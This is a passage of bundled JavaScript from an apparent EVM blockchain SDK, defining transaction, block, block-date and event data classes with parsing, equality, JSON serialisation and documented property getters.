            gasUsed: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.gasUsed),
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            blockHash: data.blockHash,
            input: data.input,
            output: data.output,
            value: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.value),
            type: data.type
        };
    };
    return EvmInternalTransaction;
}();
/**
 * The EvmTransaction is a representation of a published transaction.
 *
 * Use this class any time you work with a transaction.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$1ecb3c5cbbcf4bef = /** @class */ function() {
    function EvmTransaction(data) {
        this._data = EvmTransaction.parse(data);
    }
    /**
     * Create a new instance of EvmTransaction from any valid transaction input
     * @param data - the EvmTransactionish type
     * @example
     * ```
     * const transaction = EvmTransaction.create(data);
     *```
     */ EvmTransaction.create = function(data) {
        if (data instanceof EvmTransaction) return data;
        return new EvmTransaction(data);
    };
    EvmTransaction.parse = function(data) {
        var _a, _b;
        return {
            from: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.from),
            to: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.to, function(to) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(to);
            }),
            nonce: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.nonce, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            data: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.data),
            value: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.value, function(val) {
                return $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(val, "wei");
            }),
            hash: data.hash,
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            gas: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.gas, (0, $10891f2cb3e98601$export$d97aa349ed20696).create),
            gasPrice: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.gasPrice),
            index: +data.index,
            blockNumber: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.blockNumber),
            blockHash: data.blockHash,
            blockTimestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.blockTimestamp),
            cumulativeGasUsed: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.cumulativeGasUsed),
            gasUsed: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.gasUsed),
            contractAddress: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.contractAddress, function(address) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
            }),
            receiptRoot: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.receiptRoot),
            receiptStatus: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.receiptStatus, function(status) {
                return +status;
            }),
            logs: ((_a = data.logs) !== null && _a !== void 0 ? _a : []).map(function(log) {
                return $3dfc2d9370ba0cd1$export$138ade50fb8052f5.create(log);
            }),
            internalTransactions: ((_b = data.internalTransactions) !== null && _b !== void 0 ? _b : []).map(function(transaction) {
                return $3dfc2d9370ba0cd1$export$9a834303a812ec41.create(transaction);
            }),
            signature: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.signature, $3dfc2d9370ba0cd1$export$8da68a2b5f3f6f70.create)
        };
    };
    /**
     * Check the equality between two Evm transactions
     * @param dataA - The first transaction
     * @param dataB - The second transaction
     * @example
     * ```ts
     * EvmTransaction.equals(dataA, dataB)
     * ```
     */ EvmTransaction.equals = function(dataA, dataB) {
        var transactionA = EvmTransaction.create(dataA);
        var transactionB = EvmTransaction.create(dataB);
        if (!transactionA._data.chain.equals(transactionB._data.chain)) return false;
        if (transactionA._data.hash !== transactionB._data.hash) return false;
        return true;
    };
    /**
     * Checks the equality of the current transaction with another evm transaction
     * @param data - the transaction to compare with
     * @example
     * ```ts
     * transaction.equals(data)
     * ```
     */ EvmTransaction.prototype.equals = function(data) {
        return EvmTransaction.equals(this, data);
    };
    EvmTransaction.prototype.toJSON = function() {
        var _a, _b, _c, _d, _e, _f, _g, _h, _j, _k, _l, _m;
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            to: (_a = data.to) === null || _a === void 0 ? void 0 : _a.toJSON(),
            from: (_b = data.from) === null || _b === void 0 ? void 0 : _b.toJSON(),
            nonce: (_c = data.nonce) === null || _c === void 0 ? void 0 : _c.toString(),
            gas: (_d = data.gas) === null || _d === void 0 ? void 0 : _d.toString(),
            gasPrice: (_e = data.gasPrice) === null || _e === void 0 ? void 0 : _e.toString(),
            gasUsed: (_f = data.gasUsed) === null || _f === void 0 ? void 0 : _f.toString(),
            cumulativeGasUsed: (_g = data.cumulativeGasUsed) === null || _g === void 0 ? void 0 : _g.toString(),
            value: (_h = data.value) === null || _h === void 0 ? void 0 : _h.toString(),
            chain: (_j = data.chain) === null || _j === void 0 ? void 0 : _j.toJSON(),
            contractAddress: (_k = data.contractAddress) === null || _k === void 0 ? void 0 : _k.toJSON(),
            logs: data.logs.map(function(log) {
                return log.toJSON();
            }),
            internalTransactions: data.internalTransactions.map(function(transaction) {
                return transaction.toJSON();
            }),
            signature: (_l = data.signature) === null || _l === void 0 ? void 0 : _l.toJSON(),
            blockNumber: (_m = data.blockNumber) === null || _m === void 0 ? void 0 : _m.toString(),
            blockTimestamp: data.blockTimestamp.toString()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmTransaction.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmTransaction.prototype, "result", {
        /**
         * @returns the transaction
         * @example
         * ```
         * transaction.result
         * ```
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "to", {
        /**
         * @returns the transaction to address
         * @example
         * ```
         * transaction.to // EvmAddress
         * ```
         */ get: function() {
            return this._data.to;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "from", {
        /**
         * @returns the transaction from address
         * @example
         * ```
         * transaction.address // EvmAddress
         * ```
         */ get: function() {
            return this._data.from;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "nonce", {
        /**
         * @returns the transaction nonce
         * @example
         * ```
         * transaction.nonce // 326595425
         * ```
         */ get: function() {
            return this._data.nonce;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "gas", {
        /**
         * @returns the transaction gas
         * @example
         * ```
         * transaction.gas // 6721975
         * ```
         */ get: function() {
            return this._data.gas;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "gasPrice", {
        /**
         * @returns the transaction gas price
         * @example
         * ```
         * transaction.gasPrice // 20000000000
         * ```
         */ get: function() {
            return this._data.gasPrice;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "gasUsed", {
        /**
         * @returns the transaction gas used
         * @example
         * ```
         * transaction.gasUsed // 1340925
         * ```
         */ get: function() {
            return this._data.gasUsed;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "cumulativeGasUsed", {
        /**
         * @returns the transaction cumulative gas used
         * @example
         * ```
         * transaction.cumulativeGasUsed // 1340925
         * ```
         */ get: function() {
            return this._data.cumulativeGasUsed;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "blockNumber", {
        /**
         * @returns the transaction block number
         * @example
         * ```
         * transaction.blockNumber // 12526958
         * ```
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "value", {
        /**
         * @returns the transaction value
         * @example
         * ```
         * transaction.value // EvmNative
         * ```
         */ get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "chain", {
        /**
         * @returns the transaction chain
         * @example
         * ```
         * transaction.chain // EvmChain
         * ```
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "contractAddress", {
        /**
         * @returns the transaction contract address
         * @example
         * ```
         * transaction.contractAddress // EvmAddress
         * ```
         */ get: function() {
            return this._data.contractAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "internalTransactions", {
        /**
         * @returns the internal transactions
         * @example
         * ```
         * transaction.logs // EvmInternalTransaction[]
         * ```
         */ get: function() {
            return this._data.internalTransactions;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "logs", {
        /**
         * @returns the transaction logs
         * @example
         * ```
         * transaction.logs // EvmTransactionLog[]
         * ```
         */ get: function() {
            return this._data.logs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "receiptRoot", {
        /**
         * @returns the transaction receipt root
         * @example
         * ```
         * transaction.receiptRoot // string
         * ```
         */ get: function() {
            return this._data.receiptRoot;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "receiptStatus", {
        /**
         * @returns the transaction receipt status
         * @example
         * ```
         * transaction.receiptStatus // 1
         * ```
         */ get: function() {
            return this._data.receiptStatus;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "data", {
        /**
         * @returns the transaction data
         * @example
         * ```
         * transaction.data // 0x000000000000000000000000000000000000000000000000000000000000002
         * ```
         */ get: function() {
            return this._data.data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "hash", {
        /**
         * @returns the transaction hash
         * @example
         * ```
         * transaction.hash // 0x057Ec652A4F150f7FF94f089A38008f49a0DF88e
         * ```
         */ get: function() {
            return this._data.hash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "blockHash", {
        /**
         * @returns the transaction black hash
         * @example
         * ```
         * transaction.blockHash // 0x0372c302e3c52e8f2e15d155e2c545e6d802e479236564af052759253b20fd86
         * ```
         */ get: function() {
            return this._data.blockHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "blockTimestamp", {
        /**
         * @returns the transaction block timestamp
         * @example
         * ```
         * transaction.blockTimestamp // Date
         * ```
         */ get: function() {
            return this._data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "signature", {
        /**
         * @returns the signature (if available)
         * @example
         * ```
         * transaction.signature // EvmSignature
         * ```
         */ get: function() {
            return this._data.signature;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "index", {
        /**
         * @returns the index
         * @example
         * ```
         * transaction.index // 1
         * ```
         */ get: function() {
            return this._data.index;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "v", {
        get: function() {
            var _a;
            return (_a = this._data.signature) === null || _a === void 0 ? void 0 : _a.v;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "r", {
        get: function() {
            var _a;
            return (_a = this._data.signature) === null || _a === void 0 ? void 0 : _a.r;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmTransaction.prototype, "s", {
        get: function() {
            var _a;
            return (_a = this._data.signature) === null || _a === void 0 ? void 0 : _a.s;
        },
        enumerable: false,
        configurable: true
    });
    return EvmTransaction;
}();
/**
 * The EvmSimpleBlock is a representation of a block.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$6de1c0cb8e5a3274 = /** @class */ function() {
    function EvmSimpleBlock(data) {
        this._data = EvmSimpleBlock.parse(data);
    }
    /**
     * Create a new instance of EvmSimpleBlock from any valid transaction input
     * @param data - the EvmSimpleBlockish type
     * @example const transaction = EvmSimpleBlock.create(data);
     */ EvmSimpleBlock.create = function(data) {
        if (data instanceof EvmSimpleBlock) return data;
        return new EvmSimpleBlock(data);
    };
    /**
     * Check the equality between two Evm blocks. It compares their hashes and blocks.
     * @param dataA - The first block to compare
     * @param dataB - The second block to compare
     * @example EvmSimpleBlock.equals(dataA, dataB)
     */ EvmSimpleBlock.equals = function(dataA, dataB) {
        var blockA = EvmSimpleBlock.create(dataA);
        var blockB = EvmSimpleBlock.create(dataB);
        if (!blockA.chain.equals(blockB.chain)) return false;
        if (blockA.hash !== blockB.hash) return false;
        if (!blockA.number.equals(blockB.number)) return false;
        return true;
    };
    /**
     * Checks the equality of the current block with another evm block
     * @param data - the block to compare with
     * @example
     * ```ts
     * block.equals(data)
     * ```
     */ EvmSimpleBlock.prototype.equals = function(data) {
        return EvmSimpleBlock.equals(this, data);
    };
    /**
     * @returns a JSON represention of the block.
     * @example
     * ```
     * block.toJSON()
     * ```
     */ EvmSimpleBlock.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            number: data.number.toString(),
            chain: data.chain.toJSON()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmSimpleBlock.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmSimpleBlock.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example block.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmSimpleBlock.prototype, "number", {
        /**
         * @returns the block number.
         * @example block.number // BigNumber
         */ get: function() {
            return this._data.number;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmSimpleBlock.prototype, "hash", {
        /**
         * @returns the block hash.
         * @example block.hash // "0x9b559aef7ea858608c2e554246fe4a24287e7aeeb976848df2b9a2531f4b9171"
         */ get: function() {
            return this._data.hash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmSimpleBlock.prototype, "timestamp", {
        /**
         * @returns the block timestamp.
         * @example block.timestamp // Date
         */ get: function() {
            return this._data.timestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmSimpleBlock.prototype, "chain", {
        /**
         * @returns the block chain.
         * @example block.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    EvmSimpleBlock.parse = function(data) {
        return {
            timestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.timestamp),
            number: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.number),
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            hash: data.hash
        };
    };
    return EvmSimpleBlock;
}();
/**
 * The EvmBlock is a representation of a block.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$79fa1f4c2d188e01 = /** @class */ function() {
    function EvmBlock(data) {
        this._data = EvmBlock.parse(data);
    }
    /**
     * Create a new instance of EvmBlock from any valid transaction input
     * @param data - the EvmBlockish type
     * @example const transaction = EvmTransaction.create(data);
     */ EvmBlock.create = function(data) {
        if (data instanceof EvmBlock) return data;
        return new EvmBlock(data);
    };
    /**
     * Check the equality between two Evm blocks. It compares their hashes and blocks.
     * @param dataA - The first block to compare
     * @param dataB - The second block to compare
     * @example EvmTransaction.equals(dataA, dataB)
     */ EvmBlock.equals = function(dataA, dataB) {
        var blockA = $3dfc2d9370ba0cd1$export$6de1c0cb8e5a3274.create(dataA);
        var blockB = $3dfc2d9370ba0cd1$export$6de1c0cb8e5a3274.create(dataB);
        if (!blockA.chain.equals(blockB.chain)) return false;
        if (blockA.hash !== blockB.hash) return false;
        return true;
    };
    /**
     * Checks the equality of the current block with another evm block
     * @param data - the block to compare with
     * @example
     * ```ts
     * block.equals(data)
     * ```
     */ EvmBlock.prototype.equals = function(data) {
        return EvmBlock.equals(this, data);
    };
    /**
     * @returns a JSON represention of the block.
     * @example
     * ```
     * block.toJSON()
     * ```
     */ EvmBlock.prototype.toJSON = function() {
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            number: data.number.toString(),
            difficulty: data.difficulty.toString(),
            totalDifficulty: data.totalDifficulty.toString(),
            size: data.size.toString(),
            gasLimit: data.gasLimit.toString(),
            gasUsed: data.gasUsed.toString(),
            chain: data.chain.toJSON(),
            miner: data.miner.toJSON(),
            transactions: data.transactions.map(function(transaction) {
                return transaction.toJSON();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmBlock.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmBlock.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example block.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "number", {
        /**
         * @returns the block number.
         * @example block.number // BigNumber
         */ get: function() {
            return this._data.number;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "hash", {
        /**
         * @returns the block hash.
         * @example block.hash // "0x9b559aef7ea858608c2e554246fe4a24287e7aeeb976848df2b9a2531f4b9171"
         */ get: function() {
            return this._data.hash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "timestamp", {
        /**
         * @returns the block timestamp.
         * @example block.timestamp // Date
         */ get: function() {
            return this._data.timestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "miner", {
        /**
         * @returns the block miner.
         * @example block.miner // EvmAddress
         */ get: function() {
            return this._data.miner;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "difficulty", {
        /**
         * @returns the block difficulty.
         * @example block.difficulty // BigNumber
         */ get: function() {
            return this._data.difficulty;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "totalDifficulty", {
        /**
         * @returns the block total difficulty.
         * @example block.totalDifficulty // BigNumber
         */ get: function() {
            return this._data.totalDifficulty;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "size", {
        /**
         * @returns the block size.
         * @example block.size // BigNumber
         */ get: function() {
            return this._data.size;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "gasLimit", {
        /**
         * @returns the block gas limit.
         * @example block.gasLimit // BigNumber
         */ get: function() {
            return this._data.gasLimit;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "gasUsed", {
        /**
         * @returns the block gas used.
         * @example block.gasUsed // BigNumber
         */ get: function() {
            return this._data.gasUsed;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "transactions", {
        /**
         * @returns the block transactions.
         * @example block.transactions // EvmTransaction[]
         */ get: function() {
            return this._data.transactions;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "chain", {
        /**
         * @returns the block chain.
         * @example block.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "transactionCount", {
        /**
         * @returns the block transaction count.
         * @example block.transactionCount // 252
         */ get: function() {
            return this._data.transactionCount;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "transactionsRoot", {
        /**
         * @returns the block transactions root.
         * @example block.transactionsRoot // "0xe4c7bf3aff7ad07f9e80d57f7189f0252592fee6321c2a9bd9b09b6ce0690d27"
         */ get: function() {
            return this._data.transactionsRoot;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "stateRoot", {
        /**
         * @returns the block state root.
         * @example block.stateRoot // "0x49e3bfe7b618e27fde8fa08884803a8458b502c6534af69873a3cc926a7c724b"
         */ get: function() {
            return this._data.stateRoot;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "receiptsRoot", {
        /**
         * @returns the block receipts root.
         * @example block.receiptsRoot // "0x7cf43d7e837284f036cf92c56973f5e27bdd253ca46168fa195a6b07fa719f23"
         */ get: function() {
            return this._data.receiptsRoot;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "logsBloom", {
        /**
         * @returns the block logs bloom.
         * @example block.logsBloom // "0xdde5fc46c5d8bcbd58207bc9f267bf43298e23791a326ff02661e99790da9996b3e0dd912c0b8202d389d282c56e4d11eb2dec4898a32b6b165f1f4cae6aa0079498eab50293f3b8defbf6af11bb75f0408a563ddfc26a3323d1ff5f9849e95d5f034d88a757ddea032c75c00708c9ff34d2207f997cc7d93fd1fa160a6bfaf62a54e31f9fe67ab95752106ba9d185bfdc9b6dc3e17427f844ee74e5c09b17b83ad6e8fc7360f5c7c3e4e1939e77a6374bee57d1fa6b2322b11ad56ad0398302de9b26d6fbfe414aa416bff141fad9d4af6aea19322e47595e342cd377403f417dfd396ab5f151095a5535f51cbc34a40ce9648927b7d1d72ab9daf253e31daf"
         */ get: function() {
            return this._data.logsBloom;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "extraData", {
        /**
         * @returns the block extra data.
         * @example block.extraData // "0x65746865726d696e652d6575726f70652d7765737433"
         */ get: function() {
            return this._data.extraData;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "parentHash", {
        /**
         * @returns the block parent hash.
         * @example block.parentHash // "0x011d1fc45839de975cc55d758943f9f1d204f80a90eb631f3bf064b80d53e045"
         */ get: function() {
            return this._data.parentHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "sha3Uncles", {
        /**
         * @returns the block sha3Uncles.
         * @example block.sha3Uncles // "0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347"
         */ get: function() {
            return this._data.sha3Uncles;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlock.prototype, "nonce", {
        /**
         * @returns the block nonce.
         * @example block.nonce // "0xedeb2d8fd2b2bdec"
         */ get: function() {
            return this._data.nonce;
        },
        enumerable: false,
        configurable: true
    });
    EvmBlock.parse = function(data) {
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            miner: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(data.miner),
            timestamp: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(data.timestamp),
            number: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.number),
            difficulty: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.difficulty),
            totalDifficulty: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.totalDifficulty),
            size: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.size),
            gasLimit: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.gasLimit),
            gasUsed: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(data.gasUsed),
            transactions: data.transactions.map(function(transaction) {
                return $3dfc2d9370ba0cd1$export$1ecb3c5cbbcf4bef.create(transaction);
            }),
            chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(data.chain),
            transactionCount: +data.transactionCount
        });
    };
    return EvmBlock;
}();
var $3dfc2d9370ba0cd1$export$c2bd742cd1af735d = /** @class */ function() {
    function EvmBlockDate(data) {
        this.data = data;
    }
    /**
     * Create a new instance of EvmBlockDate.
     * @param data - the EvmBlockDateish type.
     */ EvmBlockDate.create = function(data) {
        if (data instanceof EvmBlockDate) return data;
        return new EvmBlockDate(EvmBlockDate.parse(data));
    };
    EvmBlockDate.parse = function(input) {
        return {
            block: input.block,
            date: new Date(input.date),
            timestamp: input.timestamp,
            // TODO: the swagger currently has wrong type for `block_timestamp`, should be `string`.
            blockTimestamp: String(input.block_timestamp),
            hash: input.hash,
            parentHash: input.parent_hash
        };
    };
    Object.defineProperty(EvmBlockDate.prototype, "block", {
        /**
         * @description The block number.
         * @example `9193266`
         */ get: function() {
            return this.data.block;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "date", {
        /**
         * @description The date of the block.
         * @example `2020-01-01T00:00:00+00:00`
         */ get: function() {
            return this.data.date;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "timestamp", {
        /**
         * @description The timestamp of the block
         * @example `1577836811`
         */ get: function() {
            return this.data.timestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "blockTimestamp", {
        /**
         * @description The timestamp of the block
         * @example `2022-01-03T22:59:39.000Z`
         */ get: function() {
            return this.data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "block_timestamp", {
        /**
         * @deprecated Use `blockTimestamp` instead.
         */ get: function() {
            return this.data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "hash", {
        /**
         * @description The block hash.
         * @example `0x9b559aef7ea858608c2e554246fe4a24287e7aeeb976848df2b9a2531f4b9171`
         */ get: function() {
            return this.data.hash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "block_hash", {
        /**
         * @deprecated Use `hash` instead.
         */ get: function() {
            return this.data.hash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "parentHash", {
        /**
         * @description The block hash of the parent block.
         * @example `0x011d1fc45839de975cc55d758943f9f1d204f80a90eb631f3bf064b80d53e045`
         */ get: function() {
            return this.data.parentHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmBlockDate.prototype, "parent_hash", {
        /**
         * @deprecated Use `parentHash` instead.
         */ get: function() {
            return this.data.parentHash;
        },
        enumerable: false,
        configurable: true
    });
    return EvmBlockDate;
}();
/**
 * The EvmEvent is a representation of an event.
 *
 * Use this class any time you work with an event.
 *
 * @category DataType
 */ var $3dfc2d9370ba0cd1$export$6273aab5ee1e73b8 = /** @class */ function() {
    function EvmEvent(_data) {
        this._data = _data;
    }
    /**
     * Create a new instance of EvmEvent from any valid event input
     * @param data - the EvmEventish type
     * @example
     * ```
     * const event = EvmEventish.create(data);
     *```
     */ EvmEvent.create = function(data) {
        if (data instanceof EvmEvent) return data;
        return new EvmEvent(EvmEvent.parse(data));
    };
    /**
     * Check the equality between two Evm events. It checks if the chain, block number, address and data are equal.
     * @param dataA - The first event
     * @param dataB - The second event
     * @example
     * ```ts
     * EvmEvent.equals(dataA, dataB)
     * ```
     * @returns true if the events are equal, false otherwise
     */ EvmEvent.equals = function(dataA, dataB) {
        var eventA = EvmEvent.create(dataA);
        var eventB = EvmEvent.create(dataB);
        if (!eventA._data.chain.equals(eventB._data.chain)) return false;
        if (!eventA._data.blockNumber.equals(eventB._data.blockNumber)) return false;
        if (!eventA._data.address.equals(eventB._data.address)) return false;
        if (eventA._data.data !== eventB._data.data) return false;
        return true;
    };
    /**
     * Checks the equality of the current event instance with another evm event
     * @param data - the event to compare with
     * @example
     * ```ts
     * event.equals(data)
     * ```
     * @returns true if the events are equal, false otherwise
     */ EvmEvent.prototype.equals = function(data) {
        return EvmEvent.equals(this, data);
    };
    /**
     * @returns a JSON represention of the event.
     * @example
     * ```
     * event.toJSON()
     * ```
     */ EvmEvent.prototype.toJSON = function() {
        var _a, _b, _c;
        var data = this._data;
        return $3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            address: data.address.toJSON(),
            blockNumber: data.blockNumber.toString(),
            data: {
                from: (_a = data.data.from) === null || _a === void 0 ? void 0 : _a.toJSON(),
                to: (_b = data.data.to) === null || _b === void 0 ? void 0 : _b.toJSON(),
                value: (_c = data.data.value) === null || _c === void 0 ? void 0 : _c.format()
            }
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmEvent.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmEvent.prototype, "result", {
        /**
         * @returns all the data without casting it to JSON.
         * @example event.result
         */ get: function() {
            return this._data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmEvent.prototype, "chain", {
        /**
         * @returns the event chain
         * @example event.chain // EvmChain
         */ get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmEvent.prototype, "address", {
        /**
         * @returns the event address
         * @example event.address // EvmAddress
         */ get: function() {
            return this._data.address;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmEvent.prototype, "blockNumber", {
        /**
         * @returns the event block number
         * @example event.blockNumber // BigNumber
         */ get: function() {
            return this._data.blockNumber;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmEvent.prototype, "blockTimestamp", {
        /**
         * @returns the event block timestamp
         * @example event.blockTimestamp // Date
         */ get: function() {
            return this._data.blockTimestamp;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmEvent.prototype, "data", {
        /**
         * @returns the event data with from address, to address and value
         * @example event.data
         */ get: function() {
            return this._data.data;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmEvent.prototype, "transactionHash", {
        /**
         * @returns the event block trannsaciton hash
         * @example event.transactionHash // "0xc9f62f4f6ab505a96c1a84ec2899c6bfd86245ef1effaa689fc997798be763d5"
         */ get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmEvent.prototype, "blockHash", {
        /**
         * @returns the event block hash
